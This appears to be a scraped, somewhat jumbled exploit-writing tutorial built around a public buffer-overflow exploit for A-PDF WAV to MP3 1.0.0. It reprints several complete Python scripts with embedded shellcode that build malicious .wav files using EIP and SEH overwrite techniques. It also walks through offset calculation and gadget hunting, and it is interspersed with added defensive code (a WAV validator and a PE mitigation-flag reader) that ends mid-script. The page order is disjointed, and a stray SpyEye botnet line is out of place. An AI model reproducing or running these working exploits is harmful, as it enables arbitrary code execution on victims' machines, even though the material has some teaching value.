# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
##################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = "\x41" * 4128
# 1002F1C3 call esp in lame_enc.dll
eip = "\xc3\xf1\x02\x10"
nops = "\x90" * 16
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = buff + eip + nops + shellcode
try:
    f1 = open("Drop.wav", "wb")   # binary mode; no file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
POP RETURN
If no register points directly to the shellcode, but you can see an address on the stack (the first, second or third address on the stack) that points to the shellcode, then you can load that value into EIP by first putting a pointer to a pop ret or pop pop ret (depending on where the address is found on the stack) into EIP.
In the first tutorial we saw that the shellcode was located exactly at the address loaded into EIP; it was necessary to add 8 more nops so that the shellcode began at the first byte.
Let's suppose that the shellcode is located 8 bytes further on. To reach it we can use a pop pop ret, found by searching the loaded DLLs, and then a jmp esp to point directly to the shellcode. So we put the address of a pop pop ret opcode into EIP, and right after the 8 bytes of junk we put the address of the jmp esp opcode, which jumps to the shellcode.
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
##################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
##################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = "\x41" * 4128
# 00428F3F jmp esp in wavtomp3.exe
# 10034207 pop pop ret in lame_enc.dll
eip = "\x07\x42\x03\x10"    # pop pop ret
esp = "\x3f\x8f\x42\x00"    # jmp esp, popped into EIP by the ret
junk = "\x42" * 8           # consumed by the two pops
nops = "\x90" * 4
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = buff + eip + junk + esp + nops + shellcode
try:
    f1 = open("Drop2.wav", "wb")   # binary mode; no file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
PUSH RETURN
This technique is a little different from the CALL register approach. If you can't find a jmp or call reg opcode anywhere, you can put the address directly on the stack and do a ret. Basically you look for a push reg followed by a ret, and then you put the address of this opcode sequence into EIP.
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
##################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
##################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = "\x41" * 4128
# 0047A01D push esp ret in wavtomp3.exe
eip = "\x1d\xa0\x47\x00"
nops = "\x90" * 4
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = buff + eip + nops + shellcode
try:
    f1 = open("Drop3.wav", "wb")   # binary mode; no file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
JUMP [reg + offset]
If there is a register that points to the buffer containing the shellcode, but not to the beginning of the shellcode, you can also try to find an instruction in one of the OS or application DLLs that adds the required number of bytes to the register and then jumps to it, e.g. a jmp dword ptr [esp+8].
BLIND RETURN
A RET instruction pops the last value (4 bytes) from the stack and puts that address into EIP. So if you overwrite EIP with the address of a RET instruction, you load the value stored at ESP into EIP.
We need to:
- Overwrite EIP with the address of a ret opcode
- Put the address that points to the shellcode in the first 4 bytes at ESP
So when the ret is executed, those 4 bytes are popped from the stack and put into EIP.
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
##################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
##################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = "\x41" * 4128
# 76541842 ret in user32.dll
# 00428F3F jmp esp in wavtomp3.exe
eip = "\x42\x18\x54\x76"    # ret
esp = "\x3f\x8f\x42\x00"    # jmp esp, popped into EIP by the ret
nops = "\x90" * 4
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = buff + eip + esp + nops + shellcode
try:
    f1 = open("Drop4.wav", "wb")   # binary mode; no file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
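To see how each of the four redirection techniques above (JUMP or CALL, POP RETURN, PUSH RETURN, BLIND RETURN) moves EIP and ESP, here is an added Python model that is not part of the original tutorial: simulate_return() replays the vulnerable function's RET and then the named gadgets over the exact byte layouts the four scripts build, using the addresses quoted in their comments purely as labels, and reports the offset at which execution lands. The shellcode is replaced by a constructed int3 marker; the function names are mine.

```python
import struct

# Gadget addresses quoted in the four scripts above, used here only as labels: the
# model never executes anything, it just applies each gadget's effect to EIP/ESP.
GADGETS = {
    0x1002F1C3: "call esp",       # lame_enc.dll   (JUMP or CALL)
    0x10034207: "pop pop ret",    # lame_enc.dll   (POP RETURN)
    0x0047A01D: "push esp; ret",  # wavtomp3.exe   (PUSH RETURN)
    0x76541842: "ret",            # user32.dll     (BLIND RETURN)
    0x00428F3F: "jmp esp",        # wavtomp3.exe   (second hop)
}


def simulate_return(tail, gadgets=GADGETS, base=0x0012F000, max_hops=8):
    """tail: the bytes from the overwritten saved-EIP slot onwards; base: assumed stack
    address of tail[0]. Replays the vulnerable function's RET and then each gadget that
    EIP lands on. Returns the offset into tail where execution finally lands, or None if
    EIP ends up somewhere that is neither a known gadget nor inside the buffer."""
    mem = bytearray(tail)
    esp = base
    pushed = {}                       # dwords written below tail[0] by push/call

    def pop():
        nonlocal esp
        if esp in pushed:
            value = pushed.pop(esp)
        elif 0 <= esp - base <= len(mem) - 4:
            value = struct.unpack_from("<I", mem, esp - base)[0]
        else:
            raise ValueError("ESP left the modelled stack")
        esp += 4
        return value

    def push(value):
        nonlocal esp
        esp -= 4
        pushed[esp] = value

    eip = pop()                       # the function's own RET consumes the overwritten slot
    for _ in range(max_hops):
        if base <= eip < base + len(mem):
            return eip - base         # landed inside our buffer
        name = gadgets.get(eip)
        if name == "jmp esp":
            eip = esp
        elif name == "call esp":
            target = esp              # the target is read before the return address is pushed
            push(eip + 2)
            eip = target
        elif name == "push esp; ret":
            push(esp)                 # push the old ESP, then ret pops it straight back
            eip = pop()
        elif name == "ret":
            eip = pop()
        elif name == "pop pop ret":
            pop()                     # two dwords of junk are discarded
            pop()
            eip = pop()
        else:
            return None
    return None


def le(address):
    """Little-endian encoding, as the scripts above write their addresses."""
    return struct.pack("<I", address)


def page_layouts():
    """The four tails built by the scripts above, with the shellcode replaced by a
    constructed int3 marker. Each entry: (tail bytes, offset where the nops start)."""
    sc = b"\xcc" * 8
    return {
        "jump/call":    (le(0x1002F1C3) + b"\x90" * 16 + sc, 4),
        "pop return":   (le(0x10034207) + b"\x42" * 8 + le(0x00428F3F) + b"\x90" * 4 + sc, 16),
        "push return":  (le(0x0047A01D) + b"\x90" * 4 + sc, 4),
        "blind return": (le(0x76541842) + le(0x00428F3F) + b"\x90" * 4 + sc, 8),
    }


def check_layouts():
    """name -> (landing offset, expected nops offset, ok)."""
    results = {}
    for name, (tail, nops) in page_layouts().items():
        landed = simulate_return(tail)
        results[name] = (landed, nops, landed == nops)
    return results


if __name__ == "__main__":
    for name, (landed, nops, ok) in check_layouts().items():
        print("%-13s lands at +%s (nops at +%d) %s" % (name, landed, nops, "ok" if ok else "MISS"))
```

With only 4 bytes of junk in the POP RETURN layout the second pop eats the jmp esp address and the ret loads nop bytes into EIP, which is why the junk size has to match the number of pops.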
SEH
Every application has a default exception handler which is provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable across Windows platforms, but it requires some more explanation before you can start abusing SEH to write exploits. That's why the next tutorial will be entirely dedicated to this technique.
The following video shows the techniques just described:
Whether this is true or not, no one knows, but it is interesting to get an idea of the cyber market.
You can read the full interview about SpyEye, a variant of Zeus Botnet, here:
- SpyEye Analysis Part 1
- SpyEye Analysis Part 2
This article begins a small series of tutorials that aims to make you understand, in an easier and more detailed way, how to build an exploit. The Internet is an inexhaustible source of knowledge and I also want to give my contribution.
In most cases, when there is a public exploit for a vulnerability, it does not work. This does not mean that the vulnerability is not there, but that some small piece of the puzzle was not reassembled correctly. The goal of this first tutorial is to understand, in simple steps, how these vulnerabilities work, in order to write working exploits according to our needs.
Let's start with this exploit, which triggers a buffer overflow (BOF) in the program a-pdf, a tool to convert WAV to MP3.
The exploit was tested on XP with Service Pack 3, so it doesn't work on a different platform such as Win7.
You can download the code below:
#!/usr/bin/env python
#################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
code = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
        "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
        "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
        "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
        "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
        "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
        "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
        "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
        "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
        "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
        "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
        "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
        "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
        "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
        "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
        "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
        "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
        "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
        "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
        "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
        "\x51\x42\x4c\x42\x43\x43\x30\x41\x41")
buff = "\x41" * 4132          # padding up to the SEH record
nops = "\x90" * 12
nseh = "\xEB\x06\x90\x90"     # next SEH pointer
retn = "\x5C\x26\x47\x00"     # SEH handler address
junk = "\x42" * 300
sploit = buff + nseh + retn + nops + code + junk
try:
    # No file checking, any file extension works... (.xyz .foo .abc)
    f1 = open("Dr_IDEs.wav", "w")
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
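The comment in the script above notes that the converter does no file checking at all: the files it writes are not WAV files, just raw filler bytes with an arbitrary extension. The following is an added example, not code from the page or from the converter's author, of the conservative RIFF/WAVE header validation a defender would expect an audio parser to perform before trusting any chunk. The size caps and the three sample inputs are constructed for the example.

```python
#!/usr/bin/env python3
"""Conservative RIFF/WAVE header validation (added example).

Checks a candidate .wav file for structural consistency before any chunk
is trusted. The size caps are constructed values, not taken from the page.
"""
import struct

MAX_CHUNK_BYTES = 64 * 1024 * 1024   # constructed sanity cap for any single chunk
MAX_CHANNELS = 32                    # constructed sanity cap for the fmt chunk


def check_wav(data):
    """Return a list of problems; an empty list means the header is self-consistent."""
    problems = []
    if len(data) < 12:
        return ["file shorter than the 12-byte RIFF header"]
    riff, riff_size, wave = struct.unpack_from("<4sI4s", data, 0)
    if riff != b"RIFF":
        problems.append("missing RIFF magic, got %r" % riff)
    if wave != b"WAVE":
        problems.append("missing WAVE form type, got %r" % wave)
    if problems:
        return problems  # not a WAV at all; do not walk the chunk list
    if riff_size + 8 != len(data):
        problems.append("RIFF size %d does not match file length %d"
                        % (riff_size + 8, len(data)))

    # Walk the chunk list, checking every declared size against the bytes present
    chunks = {}
    pos = 12
    while pos + 8 <= len(data):
        cid, csize = struct.unpack_from("<4sI", data, pos)
        body = pos + 8
        if csize > MAX_CHUNK_BYTES:
            problems.append("chunk %r declares %d bytes, above the cap" % (cid, csize))
            break
        if body + csize > len(data):
            problems.append("chunk %r declares %d bytes but only %d remain"
                            % (cid, csize, len(data) - body))
            break
        chunks[cid] = data[body:body + csize]
        pos = body + csize + (csize & 1)  # chunk bodies are padded to even length

    fmt = chunks.get(b"fmt ")
    if fmt is None:
        problems.append("no fmt chunk")
    elif len(fmt) < 16:
        problems.append("fmt chunk shorter than 16 bytes")
    else:
        _tag, channels, rate, byte_rate, block_align, bits = struct.unpack_from("<HHIIHH", fmt, 0)
        if channels == 0 or channels > MAX_CHANNELS:
            problems.append("implausible channel count %d" % channels)
        if bits not in (8, 16, 24, 32):
            problems.append("implausible bits per sample %d" % bits)
        if block_align != channels * bits // 8:
            problems.append("block_align %d inconsistent with channels and bits" % block_align)
        if byte_rate != rate * block_align:
            problems.append("byte_rate %d inconsistent with rate and block_align" % byte_rate)
    if b"data" not in chunks:
        problems.append("no data chunk")
    return problems


def build_wav(samples, channels=1, rate=8000, bits=16):
    """Build a minimal PCM WAV in memory (constructed test input)."""
    block_align = channels * bits // 8
    fmt = struct.pack("<HHIIHH", 1, channels, rate, rate * block_align, block_align, bits)
    body = (b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(samples)) + samples)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed inputs: a well-formed file, the raw 0x41 filler the scripts on this
# page write out, and a well-formed header whose data chunk lies about its length.
GOOD_WAV = build_wav(b"\x00\x00" * 100)
FILLER_FILE = b"\x41" * 5000
LYING_WAV = GOOD_WAV[:40] + struct.pack("<I", 4132) + GOOD_WAV[44:]

if __name__ == "__main__":
    for name, blob in (("good", GOOD_WAV), ("filler", FILLER_FILE), ("lying", LYING_WAV)):
        print(name, check_wav(blob) or "OK")
```

The point of walking every chunk against the real file length is that a parser which copies a chunk into a fixed stack buffer on the strength of the declared size is exactly the shape of bug this post goes on to exploit; rejecting inconsistent sizes up front removes that path.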
As you can read, the exploit should launch calc.exe, but on Win7 all we get is an application crash.
So how can we exploit this vulnerability on Win7?
This “simple” question will let us understand how the Windows stack works.
For now, all we need to know is that when a program is loaded into memory it is laid out in three segments:
- Code segment
- Data segment
- Stack segment
The stack segment pushes and pops frames, and the CPU keeps track of it with registers.
The most important ones are:
- ESP: pointer to the top of the stack
- EBP: pointer to the base of the current stack frame
- EIP: pointer to the next instruction
I won’t go into details that have already been widely discussed on the Internet; use Google to fill any gaps in this article.
Staying focused on our goal: there are many techniques for redirecting execution when exploiting a BOF. Looking at this exploit it is clear that it uses the SEH technique; in this tutorial, however, we’ll see how to use a jmp esp.
First we verify that there actually is a BOF and that EIP gets overwritten:
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
buff = "\x41" * 5000          # plain filler: enough to overflow and overwrite EIP
sploit = buff
try:
    # No file checking, any file extension works... (.xyz .foo .abc)
    f1 = open("Dr_IDEs2.wav", "w")
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
At this point we run the A-PDF application and attach OllyDbg to the process.
Converting the newly created file makes the application crash, and we can verify that EIP has been overwritten with A’s (“\x41” in hexadecimal notation):
So the BOF happens, but to use it we need to calculate the offset, i.e. exactly which bytes of our buffer end up in EIP. Metasploit provides some tools to help:
EIP now points to 46366846. To calculate the offset we use another Metasploit tool, which takes as input the value just found and the number of bytes that caused the BOF.
Now we know exactly where EIP gets overwritten. The buffer has a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]
We know that once EIP is overwritten and the flow of execution is hijacked, there is another register that can be useful for pointing directly at the shellcode: ESP, the top of the stack.
Let’s see exactly what happens:
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
buff = "\x41" * 4128          # offset found with the Metasploit tools
eip = "\x42" * 4              # lands in EIP
shellcode = "\x43" * 200      # lands where ESP points
sploit = buff + eip + shellcode
try:
    # No file checking, any file extension works... (.xyz .foo .abc)
    f1 = open("Dr_IDEs4.wav", "w")
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
In this script we created a BOF with the character “\x41”, overwrote EIP with “\x42” and injected further bytes, “\x43”. Analysing the registers we note that EIP has been overwritten as expected and that ESP points at the C characters (“\x43”). Bingo!
Now we replace the “\x43” characters with a working shellcode and overwrite EIP with the address of a jmp esp instruction. Thus, when the program flow reaches the address in EIP, it will jump straight to our shellcode. To find a jmp esp we have to search the DLLs of the OS and of the program that are loaded at startup.
Pressing “E” in OllyDbg shows all loaded DLLs:
Double-click the DLL, then right-click and go to “Search for -> All commands -> jmp esp”:
Found commands
Address Disassembly Comment
76BA1000 CMP DWORD PTR DS:[EDI+243276F8],ECX (Initial CPU selection)
76BC6D53 JMP ESP
So 76BC6D53 is the address of a jmp esp instruction inside user32.dll, “\x53\x6d\xbc\x76” in little endian. However, to make the exploit as reliable as possible it is good practice to use a DLL or EXE shipped with the program itself, such as “wavtomp3.exe”.
Now we can add the shellcode that launches calc.exe:
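Whether an address like the one above stays valid from one run to the next, and whether bytes placed on the stack may execute at all, is decided by two per-module opt-in bits in the PE header: DYNAMIC_BASE (the module may be rebased, so ASLR can move it) and NX_COMPAT (the module declares DEP compatibility). The following is an added example, not code from the page, that reads those bits from the DllCharacteristics field using the documented PE/COFF header layout; it is the check a hardening review runs over an application's own EXE and DLLs. The sample images are constructed header-only blobs, not loadable programs.

```python
#!/usr/bin/env python3
"""Read the DEP/ASLR opt-in flags from a PE file's DllCharacteristics (added example).

The offsets follow the documented PE/COFF header layout; the sample images
built by build_minimal_pe() are constructed in memory and cannot be loaded.
"""
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_FLAGS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",   # module accepts relocation, so ASLR can move it
    0x0100: "NX_COMPAT",      # module is DEP compatible: stack and heap not executable
    0x0400: "NO_SEH",         # image declares that it uses no structured exception handlers
    0x4000: "GUARD_CF",
}


def dll_characteristics(data):
    """Return the 16-bit DllCharacteristics field, or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER, 20 bytes
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                           # IMAGE_OPTIONAL_HEADER
    if opt_size < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):           # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    return struct.unpack_from("<H", data, opt + 70)[0]


def mitigation_report(data):
    """Map each mitigation flag name to whether the image opts in."""
    flags = dll_characteristics(data)
    return {name: bool(flags & bit) for bit, name in DLL_FLAGS.items()}


def build_minimal_pe(dll_chars, pe32plus=False):
    """Constructed header-only image: enough for the parser, never for the loader."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    machine = 0x8664 if pe32plus else 0x14C
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2102)
    magic = 0x20B if pe32plus else 0x10B
    opt = (struct.pack("<H", magic) + b"\0" * 68
           + struct.pack("<H", dll_chars)).ljust(opt_size, b"\0")
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    hardened = build_minimal_pe(0x0140)   # DYNAMIC_BASE | NX_COMPAT
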